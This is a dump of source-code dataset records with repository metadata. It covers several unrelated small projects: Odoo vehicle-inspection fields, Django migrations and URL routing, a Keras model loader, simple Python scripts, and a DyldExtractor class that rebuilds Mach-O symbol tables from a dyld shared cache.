Front_Left_Brake_Pad= fields.Selection(selection_brakes,string="Radiator")
Front_Left_Brake_Pad_img= fields.Selection(selection_brakes,string="Radiator")
Parking_Hand_Brake= fields.Selection(selection_brakes,string="Radiator")
Parking_Hand_Brake_img= fields.Selection(selection_brakes,string="Radiator")
# Interior===============================================================
Steering_Wheel_Condition= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Condition_img= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Buttons= fields.Selection(selection_interior,string="Radiator")
Steering_Wheel_Buttons_img= fields.Selection(selection_interior,string="Radiator")
Horn= fields.Selection(selection_interior,string="Radiator")
Horn_img= fields.Selection(selection_interior,string="Radiator")
Lights_Lever_Switch= fields.Selection(selection_interior,string="Radiator")
Lights_Lever_Switch_img= fields.Selection(selection_interior,string="Radiator")
Wiper_Washer_Lever= fields.Selection(selection_interior,string="Radiator")
Wiper_Washer_Lever_img= fields.Selection(selection_interior,string="Radiator")
# AC heater===============================================================
AC_Fitted= fields.Selection(selection_ac,string="Radiator")
AC_Fitted_img= fields.Selection(selection_ac,string="Radiator")
AC_Operational= fields.Selection(selection_ac,string="Radiator")
AC_Operational_img= fields.Selection(selection_ac,string="Radiator")
Blower_Condenser= fields.Selection(selection_ac,string="Radiator")
Blower_Condenser_img= fields.Selection(selection_ac,string="Radiator")
Compressor_Operatio= fields.Selection(selection_ac,string="Radiator")
Compressor_Operatio_img= fields.Selection(selection_ac,string="Radiator")
Cooling_Excellent= fields.Selection(selection_ac,string="Radiator")
Cooling_Excellent_img= fields.Selection(selection_ac,string="Radiator")
Heating= fields.Selection(selection_ac,string="Radiator")
Heating_img= fields.Selection(selection_ac,string="Radiator")
# electial heater===============================================================
Voltage= fields.Selection(selection_electrical,string="Radiator")
Voltage_img= fields.Selection(selection_electrical,string="Radiator")
Terminals_Condition= fields.Selection(selection_electrical,string="Radiator")
Terminals_Condition_img= fields.Selection(selection_electrical,string="Radiator")
Charging= fields.Selection(selection_electrical,string="Radiator")
Charging_img= fields.Selection(selection_electrical,string="Radiator")
Alternator_Operation= fields.Selection(selection_electrical,string="Radiator")
Alternator_Operation_img= fields.Selection(selection_electrical,string="Radiator")
Gauges= fields.Selection(selection_electrical,string="Radiator")
Gauges_img= fields.Selection(selection_electrical,string="Radiator")
# exterior---------------------------------------------
Trunk_Lock= fields.Selection(selection_exterior,string="Radiator")
Trunk_Lock_img= fields.Selection(selection_exterior,string="Radiator")
Front_Windshield_Condition= fields.Selection(selection_exterior,string="Radiator")
Front_Windshield_Condition_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Windshield_Condition= fields.Selection(selection_exterior,string="Radiator")
Rear_Windshield_Condition_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Fittings= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Fittings_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Levers= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Levers_img= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Front_Right_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Front_Left_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Rear_Right_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Window= fields.Selection(selection_exterior,string="Radiator")
Rear_Left_Door_Window_img= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_img= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight= fields.Selection(selection_exterior,string="Radiator")
Right_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight= fields.Selection(selection_exterior,string="Radiator")
Left_Headlight_img= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight= fields.Selection(selection_exterior,string="Radiator")
Right_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight= fields.Selection(selection_exterior,string="Radiator")
Left_Taillight_img= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights= fields.Selection(selection_exterior,string="Radiator")
Number_Plate_Lights_img= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_Working= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_Working_img= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights= fields.Selection(selection_exterior,string="Radiator")
Fog_Lights_img= fields.Selection(selection_exterior,string="Radiator")
Reverse_Light= fields.Selection(selection_exterior,string="Radiator")
Reverse_Light_img= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_Rubbers= fields.Selection(selection_exterior,string="Radiator")
Windscreen_Wiper_Rubbers_img= fields.Selection(selection_exterior,string="Radiator")
# Tyres---------------------------------------------
Front_Right_Tyre= fields.Selection(selection_tyre,string="Radiator")
Front_Right_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Front_Left_Tyre= fields.Selection(selection_tyre,string="Radiator")
Front_Left_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Rear_Right_Tyre= fields.Selection(selection_tyre,string="Radiator")
Rear_Right_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Rear_Left_Tyre= fields.Selection(selection_tyre,string="Radiator")
Rear_Left_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Spare_Tyre= fields.Selection(selection_tyre,string="Radiator")
Spare_Tyre_img= fields.Selection(selection_tyre,string="Radiator")
Brand_Name= fields.Selection(selection_tyre,string="Radiator")
Brand_Name_img= fields.Selection(selection_tyre,string="Radiator")
Tyre_Size= fields.Selection(selection_tyre,string="Radiator")
Tyre_Size_img= fields.Selection(selection_tyre,string="Radiator")
Rims= fields.Selection(selection_tyre,string="Radiator")
Rims_img= fields.Selection(selection_tyre,string="Radiator")
Wheel_Caps= fields.Selection(selection_tyre,string="Radiator")
Wheel_Caps_img= fields.Selection(selection_tyre,string="Radiator")
# Test drive---------------------------------------------
Engine_Noise= fields.Selection(selection_drive,string="Radiator")
Engine_Noise_img= fields.Selection(selection_drive,string="Radiator")
Engine_Pick= fields.Selection(selection_drive,string="Radiator")
Engine_Pick_img= fields.Selection(selection_drive,string="Radiator")
Gear_Shifting= fields.Selection(selection_drive,string="Radiator")
Gear_Shifting_img= fields.Selection(selection_drive,string="Radiator")
Drive_Shaft_Noise= fields.Selection(selection_drive,string="Radiator")
Drive_Shaft_Noise_img= fields.Selection(selection_drive,string="Radiator")
Brake_Pedal_Operation= fields.Selection(selection_drive,string="Radiator")
Brake_Pedal_Operation_img= fields.Selection(selection_drive,string="Radiator")
ABS_Operation= fields.Selection(selection_drive,string="Radiator")
ABS_Operation_img= fields.Selection(selection_drive,string="Radiator")
Front_Suspension= fields.Selection(selection_drive,string="Radiator")
Front_Suspension_img= fields.Selection(selection_drive,string="Radiator")
Rear_Suspension= fields.Selection(selection_drive,string="Radiator")
Rear_Suspension_img= fields.Selection(selection_drive,string="Radiator")
Steering_Operation= fields.Selection(selection_drive,string="Radiator")
Steering_Operation_img= fields.Selection(selection_drive,string="Radiator")
Steering_Wheel_Alignment= fields.Selection(selection_drive,string="Radiator")
Steering_Wheel_Alignment_img= fields.Selection(selection_drive,string="Radiator")
Heater_Operation= fields.Selection(selection_drive,string="Radiator")
Heater_Operation_img= fields.Selection(selection_drive,string="Radiator")
AC_Operation= fields.Selection(selection_drive,string="Radiator")
AC_Operation_img= fields.Selection(selection_drive,string="Radiator")
Speedometer= fields.Selection(selection_drive,string="Radiator")
Speedometer_img= fields.Selection(selection_drive,string="Radiator")
|
[
"rao.kashif8787@gmail.com"
] |
rao.kashif8787@gmail.com
|
c72ad5c70ed4a19f205806882e71fa796e64c8e9
|
b565bb62e123bf42644c9c72f86077238b02f2c1
|
/myproyect/bin/pip
|
69d69d0c94541a00587fc6cb6b510fa15e7a974e
|
[] |
no_license
|
grupo0331/my-first-blog
|
6bb569aab4e338d31f5935a4708fc60793741c58
|
5b502bb34192bfd7afd2f467ef79a31b14d753a9
|
refs/heads/master
| 2020-05-30T07:48:59.206361
| 2019-06-03T14:42:39
| 2019-06-03T14:42:39
| 189,539,031
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
#!/home/daw/proyecto/myproyect/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"grupo.0331@gmail.com"
] |
grupo.0331@gmail.com
|
|
7bb0d72071327484001e9078ca7127159bd0f30b
|
8f441cd3f02c7ee7b83bbe0196235f9df6ecc30b
|
/input_validation/another_validation.py
|
90d8e1e5694ce662e09db0323cc222b199ba0e95
|
[] |
no_license
|
dcoreyrasm/SoftwareDesign
|
33057ebd88872596b96dfa50f963bcde7190da52
|
58c729964fab108fd1aee364ac7c20f269b2fc30
|
refs/heads/master
| 2021-01-09T06:41:06.870660
| 2016-09-14T00:38:04
| 2016-09-14T00:38:04
| 66,110,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
#Program prompts user to enter an integer between 5 and 10 (inclusive) until
#they do so correctly.
number = input("Enter an integer between 5 and 10 (inclusive): ")
while number > 10 or number < 5:
print "Invalid input!",
number = input("Enter an integer between 5 and 10 (inclusive): ")
print ("Thank-you!")
|
[
"dcorey.rasmussen@gmail.com"
] |
dcorey.rasmussen@gmail.com
|
067a8fe4686266d56354a64f364a4c13e4adb852
|
a6da6e69b75cea41c90b6aa497896d379cfbac9c
|
/neural_nets/mnist/web/load.py
|
c03c357a9950cba2e88bbe111da7141b29242af2
|
[] |
no_license
|
grozail/otto-eilert
|
ee898c285688b87158c41c3b596ebeaca1e74f70
|
bb36429faeda671d4e7e126ff1d73212813f6039
|
refs/heads/master
| 2021-08-27T22:33:20.762926
| 2017-12-04T13:33:00
| 2017-12-04T13:33:00
| 113,045,915
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
import numpy as np
import keras.models
from keras.models import model_from_json
from scipy.misc import imread, imresize, imshow
import tensorflow as tf
def init():
json_file = open('model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
    # load weights into the new model
loaded_model.load_weights("model.h5")
print("Loaded Model from disk")
loaded_model.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])
graph = tf.get_default_graph()
return loaded_model, graph
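# Usage sketch (assumes model.json/model.h5 exist and a 28x28x1 MNIST-style
# input): the returned graph must be made the default around predict() when
# init() ran in a different thread, e.g. inside a Flask request handler.
if __name__ == '__main__':
    model, graph = init()
    with graph.as_default():
        preds = model.predict(np.zeros((1, 28, 28, 1)))
    print(preds.argmax())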
|
[
"grozail@yandex.ru"
] |
grozail@yandex.ru
|
8da6c731d5e0553722f2e56ef3a7a028a86cce95
|
4ca8df3a127e9b15cbfecea6505928741f685a63
|
/gongfei/month03/Django/onlybuy/OnlyBuy/goods/migrations/0002_goods_saller.py
|
d6b69407f107d03ed0eace38b76d59329ac825ea
|
[] |
no_license
|
gongfei6644/gongfei
|
2beb082c56197bc23ca20a6927ff6c10d8beaa83
|
bfdd5e6a3a8d76ad1e43cf54df186b944cad29e4
|
refs/heads/master
| 2022-11-30T20:49:22.213040
| 2020-08-16T12:52:28
| 2020-08-16T12:52:28
| 286,283,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2019-06-19 14:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('goods', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='goods',
name='saller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"1"
] |
1
|
e0dd3a5fc83f8f2e2d1152ce7a6035039cec3e4e
|
33f4e2028c2defd6c85e3af7d2df37f93dea1620
|
/app/pages/migrations/0001_initial.py
|
9e5af3de8615df5eda1652f005b7096b07d6b422
|
[] |
no_license
|
Alienka89/test_project
|
59bb4057c508b2e355712777c86484c481e0d846
|
8cae27149a5df76273bc7971dd2fc3e9fb4f7a9b
|
refs/heads/main
| 2023-02-26T14:53:22.849660
| 2021-02-07T23:12:17
| 2021-02-07T23:12:17
| 336,908,070
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,185
|
py
|
# Generated by Django 3.1.6 on 2021-02-07 21:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Audio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('audio', models.FileField(max_length=512, upload_to='media/pages/audio/', verbose_name='ссылка на аудио')),
('bitrate', models.IntegerField(default=256, help_text='кбит/с', verbose_name='битрейт')),
],
options={
'verbose_name': 'Аудио',
'verbose_name_plural': 'Аудио',
},
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1047, verbose_name='название страницы')),
('order_number', models.IntegerField(default=1, verbose_name='порядковый номер')),
('hide', models.BooleanField(default=False, verbose_name='скрыть')),
('counter', models.PositiveIntegerField(default=0, editable=False, verbose_name='счетчик просмотров')),
],
options={
'verbose_name': 'страница',
'verbose_name_plural': 'страницы',
'ordering': ('order_number',),
},
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to='media/pages/photo/', verbose_name='изображение')),
],
options={
'verbose_name': 'Фотография',
'verbose_name_plural': 'Фотографии',
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(verbose_name='текст')),
],
options={
'verbose_name': 'Текст',
'verbose_name_plural': 'Тексты',
},
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('video', models.CharField(max_length=512, verbose_name='ссылка на видео')),
('subtitles', models.CharField(blank=True, max_length=512, null=True, verbose_name='ссылка на субтитры')),
],
options={
'verbose_name': 'Видео',
'verbose_name_plural': 'Видео',
},
),
migrations.CreateModel(
name='Content',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1047, verbose_name='название блока контента')),
('content_type', models.CharField(choices=[('text', 'текст'), ('audio', 'аудио'), ('video', 'видео'), ('photo', 'фото')], default='text', max_length=10, verbose_name='тип контента')),
('order_number', models.PositiveIntegerField(default=1, verbose_name='порядковый номер')),
('counter', models.PositiveIntegerField(default=0, editable=False, verbose_name='счетчик просмотров')),
('audio', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.audio', verbose_name='аудио')),
('page', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='content', to='pages.page', verbose_name='Контент')),
('photo', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.photo', verbose_name='фото')),
('text', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.text', verbose_name='текст')),
('video', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.video', verbose_name='видео')),
],
options={
'verbose_name': 'контент',
'verbose_name_plural': 'контент',
'ordering': ('order_number',),
},
),
]
|
[
"abulatova@dtln.ru"
] |
abulatova@dtln.ru
|
8970935fc41f575ebe52741f5209d23c102e738e
|
648ff4244380cbd042116885c17e9cdd159f4d86
|
/SMRFF/utest.py
|
5da55559396351f95fa742e722c06d022f65f8b3
|
[] |
no_license
|
sunatthegilddotcom/perovskite-solvents
|
3d9b9fc53d7a4c30dd55131c84a1493043c55367
|
c644ff1eb9c827a348eeeb94a253690066ab7c06
|
refs/heads/master
| 2021-05-31T14:20:57.073824
| 2016-06-01T21:12:26
| 2016-06-01T21:12:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
from merlin import *
#utils.opt_opls('methacrolein', taboo_time=10)
# extra OPLS parameters: an angle term and a torsion term
# (a stray key (19, 66) carried no value in the original and is left out)
extra = { (47, 3, 46): (85.00, 120.00), (47, 47, 3, 46): (0.0, 14.0, 0.0, 0.0) }
#torsion 46 47 47 46 0.000 0.0 1 14.000 180.0 2 0.000 0.0 3
for name in ['pbcl_p']:
print utils.Molecule('cml/'+name, check_charges= False)
#2 6 [20, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
#2 4 [5, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
#2 17 [20, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
|
[
"jminuse@gmail.com"
] |
jminuse@gmail.com
|
056d8d16c6915c205d1ad27aa3394b8c877a91cb
|
d1b1c6ef92e1cd650c1479d0900d7f0ca599772d
|
/hello_django/hello/urls.py
|
ff27f829836724536d4386cfff89c4d835c02e31
|
[] |
no_license
|
MaFengWoXiaoZi/django_learning
|
30005d5c88fe646d4c9ac9c0e98cc3dacef06b22
|
fae7c6e957aede7a160c115dd2867e5b430b7c62
|
refs/heads/master
| 2021-09-05T19:36:51.263932
| 2018-01-30T15:43:50
| 2018-01-30T15:43:50
| 115,636,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
"""hello_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.core.urlresolvers import reverse
from hello import views

urlpatterns = [
url(r'^hello/$', views.hello, {'a': '123'}),
url(r'^test/\d{2}/$', 'hello.views.test'),
url(r'^test2/(?P<id>\d{2})/$', 'hello.views.test2'),
url(r'^test3/(?P<id>\d{2})/(?P<key>\w+)/$', 'hello.views.test3'),
]
#urlpatterns = [
# url(r'^hello/$', 'hello.views.hello', {'a': '123'})
#]
# The way is not recommended
#from django.conf.urls import patterns
#from hello import views
#
#urlpatterns = patterns('',
# (r'^hello/$', views.hello),
#)
|
[
"mafengwoxiaozi@gmail.com"
] |
mafengwoxiaozi@gmail.com
|
8368a60298be2826652c9b2392af1de2414977d0
|
36df29dbd2c79f41ee5e70a6b836303d0f0fe186
|
/day1-15/day01/temperature.py
|
682675e9cff305a0db4848e6ddfe9d9035042a27
|
[] |
no_license
|
roohom/Program_100Days
|
abbe20d5df4444adadc937f23f1e402fce3a8273
|
3fd87da8b8edaaeb9349f68db0b9b3cd0db9f159
|
refs/heads/master
| 2021-01-13T18:06:52.899517
| 2020-08-30T15:37:07
| 2020-08-30T15:37:07
| 242,451,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/24 14:40
# @Author : Roohom
# @Site :
# @File : temperature.py
# @Software: PyCharm
"""
Convert a Fahrenheit temperature to Celsius.
"""
F = float(input("请输入华氏温度:"))
C = (F - 32) / 1.8
print('%.2f华氏度 = %.1f摄氏度' % (F, C))
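# Example: an input of 98.60 (F) prints 37.0 (C); the inverse conversion
# would be F = C * 1.8 + 32.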
|
[
"roohom@qq.com"
] |
roohom@qq.com
|
0812e2bcc293a9c03102a0f77050227c0e0f6292
|
d0be9a3ac7c4e3eb18fc3f466bbbc3f12e1299ec
|
/app/kube_settings/validators.py
|
54810d6c4cfc940b097048c5d6bb606e4b36467b
|
[
"MIT"
] |
permissive
|
PlatformOfTrust/connector-dummy-with-tests
|
0c3f8e69058f80cdedd8f617d11bba623a93ca88
|
f7c7d2283be3b9e8a4d7ff348f7799330f6d7e6a
|
refs/heads/main
| 2023-05-09T07:12:35.378027
| 2021-06-07T11:55:58
| 2021-06-07T11:55:58
| 303,936,477
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from app.log import logger
def check_pem_key(value: str):
"""Check if string is a valid PEM formatted key"""
from Crypto.PublicKey import RSA # nosec we use PyCryptodome, not PyCrypto
try:
RSA.importKey(value)
    except Exception as exc:
        msg = "Failed to import PEM formatted key"
        logger.exception(msg)
        raise ValueError(msg) from exc
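# Usage sketch: a freshly generated PyCryptodome key passes, while anything
# that is not valid PEM raises the ValueError above.
if __name__ == '__main__':
    from Crypto.PublicKey import RSA  # nosec
    check_pem_key(RSA.generate(2048).export_key().decode())
    print("PEM key accepted")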
|
[
"noreply@github.com"
] |
PlatformOfTrust.noreply@github.com
|
5dbeac0b41a5a9769e34bc790b7a36b13aa7a48c
|
1ea814382e6038b68c2978cf3c2e0410f1a90371
|
/DyldExtractor/Converter/LinkeditConverter.py
|
c01947447aa001ef615efff87c690e3abb70d9b2
|
[] |
no_license
|
sohsatoh/DyldExtractor
|
94a9dd7da9601e24ca1e0e6909ef0584fedf3c8c
|
42b5cf65619e9d54999d9000d72b32ae4be68a2a
|
refs/heads/master
| 2023-02-19T23:01:14.557607
| 2020-12-12T16:57:17
| 2020-12-12T16:57:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,658
|
py
|
import struct
import typing
from DyldExtractor import MachO
from DyldExtractor import Dyld
from DyldExtractor import Uleb128
class LinkeditConverter(object):
"""Rebuilds the linkedit.
The all the linkedit segments in the dyld are combined
into one big linkedit segment that is shared by all
images. This class rebuilds the linkedit segment,
decaching only the necessary data.
"""
exports: typing.List[MachO.TrieEntry]
localSymEntry: Dyld.dyld_cache_local_symbols_entry
def __init__(self, machoFile: MachO.MachoFile, dyldFile: Dyld.DyldFile) -> None:
self.machoFile = machoFile
self.dyldFile = dyldFile
pass
def convert(self) -> None:
self.readExports()
self.getLocalSymEntry()
self.buildSymbolTable()
self.pointerAlignData()
pass
def readExports(self) -> None:
"""
Gets export symbols
"""
exportData = self.machoFile.getLoadCommand((MachO.LoadCommands.LC_DYLD_INFO, MachO.LoadCommands.LC_DYLD_INFO_ONLY)).exportData
self.exports = MachO.TrieParser(exportData).parse()
# remove any non ReExport symbols
reExportDeps = []
deps = self.machoFile.getLoadCommand(
(
MachO.LoadCommands.LC_LOAD_DYLIB,
MachO.LoadCommands.LC_LOAD_WEAK_DYLIB,
MachO.LoadCommands.LC_REEXPORT_DYLIB,
MachO.LoadCommands.LC_LOAD_UPWARD_DYLIB
),
multiple=True
)
if deps:
depIndex = 0
for dep in deps:
depIndex += 1
if dep.cmd == MachO.LoadCommands.LC_REEXPORT_DYLIB:
reExportDeps.append(depIndex)
def isReExport(entry: MachO.TrieEntry) -> bool:
if (entry.flags & MachO.Export.EXPORT_SYMBOL_FLAGS_KIND_MASK) != MachO.Export.EXPORT_SYMBOL_FLAGS_KIND_REGULAR:
return True
if (entry.flags & MachO.Export.EXPORT_SYMBOL_FLAGS_REEXPORT) == 0:
return True
if entry.other in reExportDeps:
return True
return False
self.exports = [export for export in self.exports if isReExport(export)]
pass
def getLocalSymEntry(self) -> None:
"""
Gets the local symbol entry from the
Dyld header.
"""
textSeg = self.machoFile.getSegment(b"__TEXT\x00")
for entry in self.dyldFile.localSymbolInfo.entries:
if entry.dylibOffset == textSeg.fileoff:
self.localSymEntry = entry
break
pass
def calculateEntryCount(self) -> int:
"""
Calculates and returns the number of
entries in the new symbol table.
"""
		symtabCommand: MachO.symtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
# count local symbols
entryCount = self.localSymEntry.nlistCount
# count other symbols
for i in range(0, len(symtabCommand.symbolData), 16):
nType = struct.unpack_from("<B", symtabCommand.symbolData, i + 4)[0]
# skip any locals in cache
if (nType & (MachO.NList.N_TYPE | MachO.NList.N_EXT)) == MachO.NList.N_SECT:
continue
entryCount += 1
# add indirect symbols
		dysymtabCommand: MachO.dysymtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_DYSYMTAB)
entryCount += dysymtabCommand.nindirectsyms
# add room for N_INDR symbols for re-exported symbols
entryCount += len(self.exports)
return entryCount
def buildSymbolTable(self) -> None:
"""
Rebuilds the symbol table.
"""
newStrData = b"\x00"
newSymTab = b""
		symtabCommand: MachO.symtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
# copy original symbols
for i in range(0, len(symtabCommand.symbolData), MachO.nlist_64.SIZE):
			symEntry: MachO.nlist_64 = MachO.nlist_64.parseBytes(symtabCommand.symbolData, i)
# skip local symbols for now
if (symEntry.n_type & (MachO.NList.N_TYPE | MachO.NList.N_EXT)) == MachO.NList.N_SECT:
continue
# get the symbol
symEnd = symtabCommand.stringData.index(b"\x00", symEntry.n_strx) + 1
symbol = symtabCommand.stringData[symEntry.n_strx:symEnd]
# adjust the entry and add it to the new tables
symEntry.n_strx = len(newStrData)
newSymTab += symEntry.asBytes()
newStrData += symbol
# add N_INDR symbols
for export in self.exports:
symEntry = MachO.nlist_64()
symEntry.n_strx = len(newStrData)
symEntry.n_type = MachO.NList.N_INDR | MachO.NList.N_EXT
symEntry.n_sect = 0
symEntry.n_desc = 0
newStrData += export.name
importName = export.importName if export.importName else export.name
symEntry.n_value = len(newStrData)
newStrData += importName
newSymTab += symEntry.asBytes()
# add the local symbols
# but first update the load commands
		dysymtabCommand: MachO.dysymtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_DYSYMTAB)
dysymtabCommand.ilocalsym = int(len(newSymTab) / MachO.nlist_64.SIZE)
dysymtabCommand.nlocalsym = self.localSymEntry.nlistCount
# add the indirect symbols
indirectSymbolLocalCount = 0
indirectsymsData = bytearray(dysymtabCommand.indirectsymsData)
for i in range(0, len(indirectsymsData), 4):
entryIndex = struct.unpack_from("<I", indirectsymsData, i)[0]
if entryIndex == 0x80000000:
indirectSymbolLocalCount += 1
continue
entryOff = entryIndex * MachO.nlist_64.SIZE
entry = MachO.nlist_64.parseBytes(symtabCommand.symbolData, entryOff)
# get the symbol
symEnd = symtabCommand.stringData.index(b"\x00", entry.n_strx) + 1
sym = symtabCommand.stringData[entry.n_strx:symEnd]
# add the entry
newEntryIndex = int(len(newSymTab) / MachO.nlist_64.SIZE)
struct.pack_into("<I", indirectsymsData, i, newEntryIndex)
entry.n_strx = len(newStrData)
newSymTab += entry.asBytes()
# add the symbol
newStrData += sym
dysymtabCommand.indirectsymsData = bytes(indirectsymsData)
# copy local symbols
for i in range(0, self.localSymEntry.nlistCount):
symOff = (i + self.localSymEntry.nlistStartIndex) * MachO.nlist_64.SIZE
symEntry = MachO.nlist_64.parseBytes(self.dyldFile.localSymbolInfo.nlistData, symOff)
localSymEnd = self.dyldFile.localSymbolInfo.stringData.index(b"\x00", symEntry.n_strx) + 1
localSym = self.dyldFile.localSymbolInfo.stringData[symEntry.n_strx:localSymEnd]
symEntry.n_strx = len(newStrData)
newSymTab += symEntry.asBytes()
newStrData += localSym
if (self.calculateEntryCount() - indirectSymbolLocalCount) != (len(newSymTab) / MachO.nlist_64.SIZE):
raise Exception("symbol count miscalculation")
# set the new data
symtabCommand.symbolData = newSymTab
symtabCommand.nsyms = int(len(newSymTab) / MachO.nlist_64.SIZE)
symtabCommand.stringData = newStrData
symtabCommand.strsize = len(newStrData)
pass
def pointerAlignData(self) -> None:
"""
Rounds up the size of various sections to the next pointer.
Assume that the pointer size is 64 bits.
"""
funcStarts = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_FUNCTION_STARTS)
while (len(funcStarts.linkeditData) % 8) != 0:
funcStarts.linkeditData += b"\x00"
funcStarts.datasize = len(funcStarts.linkeditData)
symtab = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
while (len(symtab.stringData) % 8) != 0:
symtab.stringData += b"\x00"
symtab.strsize = len(symtab.stringData)
pass
class RebaseConverter(object):
"""
Processes the compressed slide info from the dyld cache and
creates new rebase info.
"""
def __init__(self, machoFile: MachO.MachoFile, dyldFile: Dyld.DyldFile) -> None:
self.machoFile = machoFile
self.dyldFile = dyldFile
self.rebaseInfo = bytearray()
